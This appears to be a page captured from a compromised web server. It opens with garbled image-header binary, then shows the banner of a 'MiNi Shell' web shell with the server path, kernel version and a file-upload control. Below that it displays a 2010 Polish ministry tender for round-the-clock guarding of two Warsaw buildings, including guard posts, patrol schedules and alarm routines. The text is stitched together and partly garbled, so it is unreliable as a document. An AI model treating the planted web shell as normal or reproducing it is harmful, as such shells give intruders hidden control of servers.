JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100223/37369-N-2010.html

<p class="kh_header"><b>Warszawa: Świadczenie usług całodobowej ochrony obiektów Ministerstwa Nauki i Szkolnictwa Wyższego</b><br>
<b>Numer ogłoszenia: 37369 - 2010; data zamieszczenia: 23.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Nauki i Szkolnictwa Wyższego , ul. Wspólna 1/3, 00-529 Warszawa, woj. mazowieckie, tel. 022 5292738, faks 022 5292780.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mnisw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług całodobowej ochrony obiektów Ministerstwa Nauki i Szkolnictwa Wyższego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług całodobowej ochrony:
a) budynku, terenu wokół budynku i parkingu należących do posesji Ministerstwa Nauki i Szkolnictwa Wyższego, zwanego dalej MNiSW,
b) budynku będącego w posiadaniu Zamawiającego na podstawie umowy najmu 
nr 25/BG/2008 z dnia 30 kwietnia 2008 r., zawartej ze spółką Nowogrodzka 
Sp. z o.o. (Zamówienie jest współfinansowane ze środków Europejskiego Funduszu Regionalnego w ramach Pomocy Technicznej Programu Operacyjnego Innowacyjna Gospodarka).
2. Budynek, o którym mowa w ust. 1 lit. a) znajduje się przy ul. Wspólnej 1/3 w Warszawie. Na parterze znajdują się dwie portiernie: od ulicy Hożej 20 portiernia główna, od ulicy Wspólnej 1/3 portiernia tylko dla pracowników. Budynek jest podpiwniczony, siedmiokondygnacyjny, wolnostojący, o przekroju w kształcie litery u, o powierzchni 10 846 m2.
3. Parking, o którym mowa w ust. 1 lit. a) przylega do budynku opisanego w ust. 2, znajduje się od strony ul Hożej. Parking jest ogrodzony, na 38 stanowisk, do którego wjazd i wyjazd zamykany jest dwustronnie uchylnymi szlabanami (z możliwością zdalnego otwierania przez stałych użytkowników). Obok parkingu znajduje się pomieszczenie strażnicze.
4. Budynek, o którym mowa w ust. 1 lit. b) znajduje się przy ul. Nowogrodzkiej 62 C w Warszawie. Na parterze znajduje się portiernia. Budynek jest podpiwniczony, siedmiokondygnacyjny, o powierzchni 2 344 m2,  w tym 1 354 m2 kondygnacji naziemnych (powierzchnie biurowe) i 990 m2 powierzchni kondygnacji podziemnej (sala konferencyjna, zaplecze socjalno- bytowe, magazyny biurowe).
5. Przedmiot zamówienia obejmuje:
1) pełnienie całodobowej ochrony obiektu MNiSW przy ulicy Wspólnej 1/3 w Warszawie, polegającej w szczególności na:  
a) zapewnieniu ochrony osób przebywających w budynku i granicach ochranianego obszaru i mienia znajdującego się w budynkach i na terenie parkingu,
b) nadzorze nad ruchem pracowników, gości i interesantów na terenie ministerstwa oraz prowadzeniu ewidencji w tym zakresie,
c) niedopuszczeniu do przebywania na terenie budynku i na parkingu osób nieuprawnionych,
d) przeciwdziałaniu kradzieżom, napadom i innym zakłóceniom spokoju i porządku,
e) dokonywaniu obchodów wewnętrznych i zewnętrznych chronionych obiektów, ze szczególnym zwróceniem uwagi na bezpieczeństwo ogólne i przeciwpożarowe,
f) kontrolowaniu legalności wynoszenia z i wnoszenia do budynku sprzętów, urządzeń, przedmiotów,
g) nadzorze i obsłudze stanowiska monitoringu,
h) nadzorze nad ruchem pojazdów na parkingu oraz prowadzeniu ewidencji w tym zakresie, a także niedopuszczeniu do wjazdu na teren parkingu nieuprawnionych samochodów,
i) alarmowaniu i ostrzeganiu osób przebywających na terenie obiektu w przypadku wystąpienia lub otrzymania informacji o zagrożeniu bezpieczeństwa,
j) podejmowaniu interwencji zmierzającej do udaremnienia naruszenia systemu ochrony oraz zapobieganiu lub ograniczeniu skutków zagrożenia dla bezpieczeństwa osób i ochrony mienia przez osoby pełniące służbę i patrol interwencyjny,
k) pełnieniu służby na dwóch portierniach i parkingu - 3 posterunki,
l) przeprowadzaniu systematycznych obchodów siedmiu kondygnacji budynku (winny być dokonywane przez pracownika nie rzadziej niż 2 razy w godzinach pracy urzędu i nie rzadziej niż co 2 godziny poza godzinami pracy urzędu), 
ze szczególnym sprawdzeniem zabezpieczenia wybranych pomieszczeń 
(np. kancelaria tajna, kasa, serwerownia, pomieszczenie kadr),
m) współudziale przedstawiciela Wykonawcy w opracowywaniu i aktualizacji planu ochrony obiektu;
2) pełnienie całodobowej ochrony budynku i terenu przyległego do budynku przy 
ul. Nowogrodzkiej 62c w Warszawie, polegającej w szczególności na:  
a) zapewnieniu ochrony osób przebywających w budynku i granicach ochranianego obszaru i mienia znajdującego się w budynku,
b) prowadzeniu nadzoru nad ruchem pracowników, gości i interesantów na terenie budynku oraz prowadzenia ewidencji w tym zakresie,
c) niedopuszczeniu do przebywania na terenie budynku osób nieuprawnionych,
d) przeciwdziałaniu kradzieżom, napadom i innym zakłóceniom spokoju i porządku,
e) dokonywaniu obchodów wewnętrznych chronionego obiektu, ze szczególnym zwróceniem uwagi na bezpieczeństwo ogólne i przeciwpożarowe,
f) obchodzie wewnętrznym budynku, który odbywać się będzie po uprzednim rozbrojeniu alarmu na nocnej zmianie, po zakończeniu obchodu Wykonawca jest zobowiązany do ponownego i prawidłowego uzbrojenia systemu alarmowego. Potwierdzenie prawidłowego uzbrojenia dokonuje się w stacji monitoringu Firmy SKORPION GRUP S.A.,
g) kontrolowaniu legalności wynoszenia i wnoszenia do budynku sprzętów, urządzeń, przedmiotów na podstawie karty materiałowej i właściwych numerów ewidencyjnych,
h) alarmowaniu i ostrzeganiu osób przebywających na terenie budynku w przypadku wystąpienia lub otrzymania informacji o zagrożeniu bezpieczeństwa,
i) podejmowaniu interwencji zmierzającej do udaremnienia naruszenia systemu ochrony oraz zapobieganie lub ograniczenie skutków zagrożenia dla bezpieczeństwa osób i ochrony mienia przez osoby pełniące służbę w budynku i patrol interwencyjny,
j) pełnieniu służby na portierni -  jednym posterunku,
k) przeprowadzaniu systematycznych obchodów siedmiu kondygnacji budynku (winny być dokonywane przez pracownika nie rzadziej niż 2 razy w godzinach pracy urzędu i nie rzadziej niż co 2 godziny poza godzinami pracy urzędu),
l) przeprowadzaniu systematycznych obchodów budynku w wyznaczonym przez Zamawiającego obszarze - winny być dokonywane przez pracownika nie rzadziej niż 3 razy w godzinach nocnych w dni robocze oraz w dni świątecznie i wolne od pracy,
m) współpracy z firmą prowadzącą całodobowy monitoring obiektu,
n) załączaniu i wyłączania alarmu przez osobę pełniącą służbę;
3) konwojowaniu osób i przesyłek (do trzech razy w miesiącu w zależności od potrzeb Zamawiającego). 
6. Wykonawca zapewni:
1) stałych pracowników ochrony (tj. pełniących służbę tylko w MNiSW) w ilości niezbędnej do wykonania usługi:
a) w budynku przy ul. Wspólnej 1/3 w Warszawie: nie mniej jednak niż 5 pracowników zatrudnionych na dziennej zmianie (w godz. 7oo - 19oo) oraz 3 pracowników zatrudnionych na nocnej zmianie (w godz. 19oo - 7oo), 
z zastrzeżeniem, że na każdej zmianie pełnił będzie służbę jako kierownik zmiany co najmniej 1 pracownik posiadający licencję pracownika ochrony fizycznej,
b) w budynku przy ul. Nowogrodzkiej 62 C w Warszawie: nie mniej jednak niż 1 pracownika zatrudnionego na dziennej zmianie (w godz. 7oo - 19oo) oraz 1 pracownika zatrudnionego na nocnej zmianie (w godz. 19oo - 7oo), z zastrzeżeniem, że na każdej zmianie pełnił będzie służbę co najmniej 1 pracownik posiadający licencję pracownika ochrony fizycznej;
2) całodobowe monitorowanie sygnałów alarmowych pochodzących z chronionych obiektów;
3) środki łączności zapewniające niezakłóconą łączność w czasie wykonywania usługi pomiędzy posterunkami, patrolem interwencyjnym i centrum monitorowania Wykonawcy również podczas realizacji obchodów i patroli;
4) środki przymusu bezpośredniego, w które zostaną wyposażeni pracownicy ochrony umożliwiające prawidłowe i skuteczne wykonanie usługi ochrony obiektów;
5) co najmniej dwie osoby z licencjami pracownika ochrony fizycznej, pełniącymi służbę w samochodzie patrolowym na terenie Warszawy (grupa interwencyjna), tak, aby mogła podjąć interwencję w budynkach ministerstwa w czasie nie dłuższym niż 10 minut w godzinach od 22:00 do 6:00 oraz 15 minut w godzinach od 6:00 do 22:00, od przekazania sygnału o zagrożeniu do Stacji Monitorowania Alarmów Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca ubiegający się o niniejsze zamówienie zobowiązany jest do wniesienia wadium (przed upływem terminu składania ofert) w wysokości 6.000 zł (słownie złotych: sześć tysięcy)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez Wykonawców warunku udziału w postępowaniu o udzielenie zamówienia publicznego w zakresie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania zostanie dokonana wg formuły spełnia/nie spełnia, na podstawie informacji zawartych w dokumentach i oświadczeniach złożonych przez Wykonawcę tj. aktualnej koncesji udzielonej przez Ministra Spraw Wewnętrznych i Administracji na działalność gospodarczą w zakresie ochrony osób i mienia.
Z treści załączonego do oferty dokumentu musi jednoznacznie wynikać, iż Wykonawca spełnia warunki udziału w postępowaniu określone przez Zamawiającego w niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez Wykonawców warunku udziału w postępowaniu o udzielenie zamówienia publicznego w zakresie wiedzy i doświadczenia zostanie dokonana wg formuły spełnia/nie spełnia, na podstawie informacji zawartych w dokumentach i oświadczeniach złożonych przez Wykonawcę tj. wykazie wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej trzech usług ochrony osób i mienia, każda o  wartości brutto nie mniejszej niż 450 000,00 zł (słownie złotych: czterysta pięćdziesiąt tysięcy) z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz dokumentów potwierdzających, że usługi te zostały wykonane należycie np. protokoły odbioru, referencje wystawione przez Zamawiającego (podmiot, który zlecał wykonanie usługi). Z powyższych dokumentów musi wynikać, że Wykonawca spełnia warunki określone przez Zamawiającego w zakresie wiedzy i doświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez Wykonawców warunku udziału w postępowaniu o udzielenie zamówienia publicznego w zakresie dysponowania odpowiednim potencjałem technicznym zostanie dokonana wg formuły spełnia/nie spełnia, na podstawie informacji zawartych w dokumentach i oświadczeniach złożonych przez Wykonawcę tj. wykazie narzędzi i urządzeń dostępnych Wykonawcy usługi w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami. Z powyższego dokumentu musi wynikać, że Wykonawca spełnia warunki określone przez Zamawiającego w zakresie posiadania technicznej możliwości całodobowego monitorowania i odbierania sygnałów alarmowych pochodzących z chronionych obiektów, również za pośrednictwem technicznych środków łączności, umożliwiających łączność pomiędzy pracownikiem ochrony i centralą firmy lub Policji, w które będą wyposażeni pracownicy przewidziani do realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez Wykonawców warunku udziału w postępowaniu o udzielenie zamówienia publicznego w zakresie osób zdolnych do wykonania zamówienia zostanie dokonana wg formuły spełnia/nie spełnia, na podstawie informacji zawartych w dokumentach i oświadczeniach złożonych przez Wykonawcę tj.: wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usługi, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie dysponowania tymi osobami. Z powyższego dokumentu musi wynikać, że Wykonawca spełnia warunki określone przez Zamawiającego w zakresie posiadania osób zdolnych do wykonania zamówienia tj. dysponuje odpowiednią ilością pracowników ochrony:
- spełniających warunki określone w niniejszej SIWZ niezbędną do wykonania zamówienia;
- posiadających licencję pracownika ochrony fizycznej.
UWAGA 
Wykonawca do realizacji przedmiotu zamówienia musi przeznaczć osoby, które nie figurują w Krajowym Rejestrze Karnym oraz spełniają wymóg, o którym mowa w art. 26 ust. 3 pkt 2 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. z 2005 r. Nr 145 poz. 1221 z późn. zm.) oraz spełniają warunki określone w Specyfikacji Istotnych Warunków Zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez Wykonawców warunku udziału w postępowaniu o udzielenie zamówienia publicznego w zakresie sytuacji ekonomicznej i finansowej zostanie dokonana wg formuły spełnia/nie spełnia, na podstawie informacji zawartych w dokumentach i oświadczeniach złożonych przez Wykonawcę tj.: opłaconej polisie w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Z powyższego dokumentu musi wynikać, że Wykonawca spełnia warunki określone przez Zamawiającego w zakresie sytuacji ekonomicznej i finansowej tj.: posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 4.000.000,00 zł (słownie złotych: cztery miliony).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do podejmowania zobowiązań w imieniu Wykonawcy, 
o ile nie wynika z przepisów prawa lub innych dokumentów,
2. Pełnomocnictwo dla Pełnomocnika Wykonawców wspólnie ubiegających 
się o udzielenie zamówienia publicznego do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia.
3. Pełnomocnictwo musi zawierać zakres upełnomocnienia i być złożone w formie oryginału lub kopii poświadczonej notarialnie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.nauka.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ministerstwo Nauki i Szkolnictwa Wyższego
ul. Wspólna 1/3 (wejście od ul. Hożej 20)
00-529 Warszawa
Wydział Zamówień Publicznych (pokój nr 38).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2010 godzina 11:00, miejsce: Ministerstwo Nauki i Szkolnictwa Wyższego
ul. Wspólna 1/3, 00-529 Warszawa
(wejście od ul. Hożej 20, po wcześniejszym pobraniu przepustki)
Wydział Zamówień Publicznych, pokój 38.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Część przedmiotu zamówienia dotycząca świadczenia usług całodobowej ochrony
budynku będącego w posiadaniu Zamawiającego na podstawie umowy najmu 
nr 25/BG/2008 z dnia 30 kwietnia 2008 r. będzie współfinansowana ze środków Europejskiego Funduszu Regionalnego w ramach Pomocy Technicznej Programu Operacyjnego Innowacyjna Gospodarka.
2. Dokumenty należy składać w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
3. Forma przekazywania dokumentów:
1) pytania Wykonawców do treści SIWZ, odpowiedzi Zamawiającego oraz modyfikacja SIWZ - forma pisemna lub poczta elektroniczna lub faks;
2) złożenie oferty (wraz z załącznikami) - forma pisemna;
3) powiadomienie przez Wykonawcę o wprowadzeniu zmiany w ofercie lub wycofaniu oferty - forma pisemna;
4) złożenie brakujących oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu - forma pisemna (Wykonawca złoży je w terminie wyznaczonym przez Zamawiającego). Z treści załączonych do oferty dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia warunki określone przez Zamawiającego w SIWZ;
5) złożenie przez Wykonawcę wyjaśnień dotyczących treści oferty - forma pisemna lub faks;
6) zawiadomienie o wyniku postępowania - faks (oryginał pisma zostanie wysłany pocztą na adres wskazany w ofercie Wykonawcy);
7) zgoda Wykonawcy na przedłużenie terminu związania ofertą - forma pisemna.
